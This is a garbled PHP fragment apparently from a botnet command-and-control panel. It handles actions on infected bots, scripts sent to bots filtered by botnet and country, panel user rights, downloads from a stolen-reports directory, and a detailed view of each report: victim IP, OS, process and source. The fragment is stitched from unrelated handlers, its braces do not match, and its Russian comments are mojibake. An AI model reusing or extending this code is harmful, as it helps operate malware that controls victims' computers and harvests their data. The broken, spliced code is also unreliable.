///////////////////////////////////////////////////////////////////////////////////////////////////
if ((!empty($_GET['botsaction']) || !empty($_POST['botsaction'])) && (!empty($_POST['bots']) && is_array($_POST['bots']) || !empty($_GET['bots']) && is_array($_GET['bots']))) {
$bedit = empty($userData['r_edit_bots']) ? 0 : 1;
$ba = !empty($_GET['botsaction']) ? $_GET['botsaction'] : $_POST['botsaction'];
$blist = !empty($_POST['bots']) && is_array($_POST['bots']) ? $_POST['bots'] : $_GET['bots'];
$blist = array_unique($blist);
//Проверям есть ли право на действие.
$deny = true;
foreach ($botMenu as $item) {
if ($item[0] !== 0 && strcmp($item[0], $ba) === 0) {
$deny = false;
break;
}
}
if ($deny) {
ThemeFatalError(LNG_ACCESS_DEFINED);
}
//Составляем список ботов для MySQL.
$sqlBlist = '';
$count = 0;
foreach ($blist as $bot) {
$sqlBlist .= ($count++ == 0 ? '' : ' OR ') . "`bot_id`='" . addslashes($bot) . "'";
}
if (strcmp($ba, 'fullinfo') === 0 || strcmp($ba, 'fullinfoss') === 0) {
// makefavorite
if (isset($_REQUEST['makefavorite'])) {
$botIdQ = mysql_real_escape_string($_REQUEST['bots'][0]);
mysql_query('UPDATE `botnet_list` SET `favorite`=IF(`favorite`=0, 1, 0) WHERE `bot_id`="' . $botIdQ . '";');
echo mysql_result(mysql_query('SELECT `favorite` FROM `botnet_list` WHERE `bot_id`="' . $botIdQ . '";'), 0, 0);
die;
}
//Получаем данные скрипта.
if (count($errors) > 0) {
$f_name = htmlEntitiesEx($_POST['name']);
$f_is_enabled = $_POST['status'] > 0 ? true : false;
$f_limit = intval($_POST['limit']);
$f_bots = htmlEntitiesEx($_POST['bots']);
$f_botnets = htmlEntitiesEx($_POST['botnets']);
$f_countries = htmlEntitiesEx($_POST['countries']);
$f_context = htmlEntitiesEx($_POST['context']);
} else {
if ($is_view || $_GET['new'] != -1) {
if (!($r = mysqlQueryEx('botnet_scripts', 'SELECT name, flag_enabled, send_limit, bots_wl, bots_bl, botnets_wl, botnets_bl, countries_wl, countries_bl, script_text, extern_id FROM botnet_scripts WHERE id=\'' . addslashes($is_view ? $_GET['view'] : $_GET['new']) . '\' LIMIT 1'))) {
ThemeMySQLError();
}
if (!($m = @mysql_fetch_row($r))) {
ThemeFatalError(LNG_BOTNET_SCRIPT_E1, 0, 0, 0);
}
$f_name = htmlEntitiesEx($m[0]);
$f_is_enabled = $m[1] > 0 ? true : false;
$f_limit = intval($m[2]);
$f_bots = htmlEntitiesEx(SQLListToExp($m[3], $m[4]));
$f_botnets = htmlEntitiesEx(SQLListToExp($m[5], $m[6]));
$f_countries = htmlEntitiesEx(SQLListToExp($m[7], $m[8]));
$f_context = htmlEntitiesEx($m[9]);
if (!$is_view) {
$f_name = 'Copy of ' . $f_name;
}
} else {
$f_name = 'script_' . CURRENT_TIME;
$f_is_enabled = true;
$f_limit = 0;
if (count($errors) > 0) {
$formName = htmlEntitiesEx($_POST['name']);
$formEnabled = $_POST['status'] > 0 ? true : false;
$formComment = htmlEntitiesEx($_POST['comment']);
foreach ($rights as $k => &$v) {
if (isset($_POST[$k]) && $_POST[$k] > 0) {
$v = 1;
}
}
} else {
if ($isEdit || $_GET['new'] != -1) {
if (!($r = mysqlQueryEx('cp_users', 'SELECT * FROM cp_users WHERE id=\'' . addslashes($isEdit ? $_GET['edit'] : $_GET['new']) . '\' LIMIT 1'))) {
ThemeMySQLError();
}
if (!($m = @mysql_fetch_assoc($r))) {
ThemeFatalError(LNG_SYS_USER_E1, 0, 0, 0);
}
$formName = htmlEntitiesEx($m['name']);
$formEnabled = $m['flag_enabled'] > 0 ? true : false;
$formComment = htmlEntitiesEx($m['comment']);
foreach ($rights as $k => &$v) {
if (isset($m[$k]) && $m[$k] > 0) {
$v = 1;
}
}
if (!$isEdit) {
$formName = 'Copy of ' . $formName;
}
} else {
$formName = 'user_' . CURRENT_TIME;
$formEnabled = true;
$_FILTER['path'] .= ($_FILTER['path'] == '' ? '' : '/') . $_GET['sub'];
}
if (pathUpLevelExists($_FILTER['path'])) {
die('WOW!');
}
$_CUR_PATH = $_FILTER['path'] == '' ? $config['reports_path'] : $config['reports_path'] . '/' . $_FILTER['path'];
///////////////////////////////////////////////////////////////////////////////////////////////////
// Загрузка файла.
///////////////////////////////////////////////////////////////////////////////////////////////////
if (isset($_GET['file'])) {
if (pathUpLevelExists($_GET['file'])) {
die('SUPER WOW!');
}
$fl = $_CUR_PATH . '/' . $_GET['file'];
if (!@file_exists($fl) || !@is_file($fl)) {
ThemeFatalError('File not exists.');
}
httpDownloadHeaders(urldecode(baseNameEx($_GET['file'])), @filesize($fl));
echo @file_get_contents($fl);
die;
}
///////////////////////////////////////////////////////////////////////////////////////////////////
// Создание архива/Удаление файлов.
///////////////////////////////////////////////////////////////////////////////////////////////////
if (isset($_POST['filesaction']) && is_numeric($_POST['filesaction']) && !empty($_POST['files']) && is_array($_POST['files'])) {
foreach ($_POST['files'] as $file) {
if (pathUpLevelExists($file)) {
die('PUPER WOW!');
}
}
//Удаление файлов.
$sub_url = QUERY_STRING_HTML . '&t=' . htmlEntitiesEx(urlencode($_GET['t'])) . '&id=' . htmlEntitiesEx(urlencode($_GET['id']));
//RџSЂRѕRІRμSЂSЏRμRј C ReRї RѕS, C ‡ RμS, P °.
$context = '';
if ($m[14] == BLT_FILE || $m[14] == BLT_UNKNOWN) {
if (($file = baseNameEx($m[16])) == '') {
$file = 'file';
}
$context = str_replace(array('{URL}', '{TEXT}'), array($sub_url . '&download=1', sprintf(LNG_REPORTS_VIEW_DOWNLOAD, htmlEntitiesEx($file), numberFormatAsInt($m[15]))), THEME_LIST_ANCHOR);
$context = str_replace(array('{WIDTH}', '{TEXT}'), array('1%', THEME_STRING_SPACE), THEME_LIST_ITEM_LTEXT_U2) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', $context), THEME_LIST_ITEM_LTEXT_U2);
} else {
$r = mysqlQueryEx($tbl, "SELECT context FROM {$tbl} WHERE {$tbl}.id='" . addslashes($_GET['id']) . "' LIMIT 1");
if (!$r) {
ThemeMySQLError();
}
if (@mysql_affected_rows() != 1 || !($cc = @mysql_fetch_row($r))) {
ThemeFatalError(LNG_REPORTS_VIEW_NOT_EXISTS);
}
$context = str_replace(array('{COLUMNS_COUNT}', '{WIDTH}', '{TEXT}'), array(2, '100%', htmlEntitiesEx($cc[0])), THEME_LIST_ITEM_PLAIN_U1);
}
//R'S <RІRѕRґ.
$data = str_replace('{WIDTH}', '100%', THEME_LIST_BEGIN) . str_replace(array('{COLUMNS_COUNT}', '{TEXT}'), array(2, sprintf(LNG_REPORTS_VIEW_TITLE2, bltToLng($m[14]), numberFormatAsInt($m[15]))), THEME_LIST_TITLE) . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_BOTID), THEME_LIST_ITEM_LTEXT_U1) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', botPopupMenu($m[0], 'botmenu')), THEME_LIST_ITEM_LTEXT_U1) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_BOTNET), THEME_LIST_ITEM_LTEXT_U2) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlEntitiesEx($m[1])), THEME_LIST_ITEM_LTEXT_U2) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_VERSION), THEME_LIST_ITEM_LTEXT_U1) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', intToVersion($m[2])), THEME_LIST_ITEM_LTEXT_U1) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_OS), THEME_LIST_ITEM_LTEXT_U2) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', osDataToString($m[3])), THEME_LIST_ITEM_LTEXT_U2) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_OSLANG), THEME_LIST_ITEM_LTEXT_U1) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlEntitiesEx($m[4])), THEME_LIST_ITEM_LTEXT_U1) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_TIME), THEME_LIST_ITEM_LTEXT_U2) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlEntitiesEx(gmdate(LNG_FORMAT_DT, $m[5] + $m[6]))), THEME_LIST_ITEM_LTEXT_U2) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_TIMEBIAS), THEME_LIST_ITEM_LTEXT_U1) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', timeBiasToText($m[6])), THEME_LIST_ITEM_LTEXT_U1) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_TICK), THEME_LIST_ITEM_LTEXT_U2) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', tickCountToText($m[7] / 1000)), THEME_LIST_ITEM_LTEXT_U2) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_RTIME), THEME_LIST_ITEM_LTEXT_U1) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlEntitiesEx(gmdate(LNG_FORMAT_DT, $m[8]))), THEME_LIST_ITEM_LTEXT_U1) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_COUNTRY), THEME_LIST_ITEM_LTEXT_U2) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlEntitiesEx($m[9])), THEME_LIST_ITEM_LTEXT_U2) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_IPV4), THEME_LIST_ITEM_LTEXT_U1) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlEntitiesEx($m[10])), THEME_LIST_ITEM_LTEXT_U1) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_COMMENT), THEME_LIST_ITEM_LTEXT_U2) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', empty($m[17]) ? '-' : htmlEntitiesEx($m[17])), THEME_LIST_ITEM_LTEXT_U2) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_USED), THEME_LIST_ITEM_LTEXT_U1) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', $m[18] == 1 ? LNG_YES : LNG_NO), THEME_LIST_ITEM_LTEXT_U1) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_PROCNAME), THEME_LIST_ITEM_LTEXT_U2) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', empty($m[11]) ? '-' : htmlEntitiesEx($m[11])), THEME_LIST_ITEM_LTEXT_U2) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_PROCUSER), THEME_LIST_ITEM_LTEXT_U1) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', empty($m[12]) ? '-' : htmlEntitiesEx($m[12])), THEME_LIST_ITEM_LTEXT_U1) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_REPORTS_VIEW_SOURCE), THEME_LIST_ITEM_LTEXT_U2) . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', empty($m[13]) ? '-' : htmlEntitiesEx($m[13])), THEME_LIST_ITEM_LTEXT_U2) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . $context . THEME_LIST_ROW_END;
themeSmall(LNG_REPORTS_VIEW_TITLE, $data . THEME_LIST_END, 0, getBotJsMenu('botmenu'), 0);
die;
}
////////////////////////////////////////////////// / / ///////////////////////////////////////////////
// RћRїSЂRμRґRμR "SЏRμRј RґR ° RЅRЅS <Rμ RґR" SЏ with "Pepsi" SЊS, SЂR °.
////////////////////////////////////////////////// / / ///////////////////////////////////////////////
//RџSЂRe RґRѕR ± P ° RІR "RμRЅReRe RЅRѕRІS <C ... RїR ° ° SЂR RјRμS, SЂRѕRІ RЅSѓR ¶ RЅRѕ SѓRЅReS ‡ C RѕR ¶ P ° C SЊ RЅRμ RЅSѓR ¶ RЅS <Rμ RґR" SЏ js: datelist.
$filter['date1'] = isset($_GET['date1']) ? intval($_GET['date1']) : 0;
$filter['date2'] = isset($_GET['date2']) ? intval($_GET['date2']) : 0;
if ($filter['date1'] > $filter['date2']) {
